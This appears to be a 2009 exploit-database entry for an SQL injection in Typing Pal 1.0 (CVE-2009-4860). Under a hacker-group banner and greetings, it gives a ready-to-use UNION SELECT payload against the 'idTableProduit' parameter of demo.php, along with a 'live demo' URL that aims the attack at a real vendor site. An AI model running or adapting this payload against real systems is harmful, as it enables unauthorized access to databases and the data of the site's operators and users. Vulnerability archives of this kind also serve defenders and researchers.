Typing Pal 1.0 - 'idTableProduit' SQL Injection
Author: Red-D3v1L
type: webapps
platform: php
port:
date_added: 2009-08-06
date_updated:
verified: 1
codes: OSVDB-64564;CVE-2009-4860
tags:
aliases:
screenshot_url:
application_url:
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
[»] Typing Pal <= 1.0 Remote SQL injection Vulnerability
==============================================================================
[»] my home: [ Hackteach.org ]
[»] Script: [ Typing Pal ]
[»] Language: [ PHP ]
[»] home: [ http://www.demarque.qc.ca/download_demo/popupDownload.asp?noProduit=63&langue=1 ]
[»] Founder: [ Red-D3v1L < php-c0de@hotmail.com > ]
[»] Gr44tz to: [ All member Hackteach.org/cc ]
###########################################################################
===[ Exploit SQL ]===
[»] {PAHT}/demo.php?idTableProduit=-63+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20--
[»] l1v3 d3m0 : http://education.demarque.com/demo.php?idTableProduit=-63+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20--
Author: Red-D3v1L <-
###########################################################################
# milw0rm.com [2009-08-07]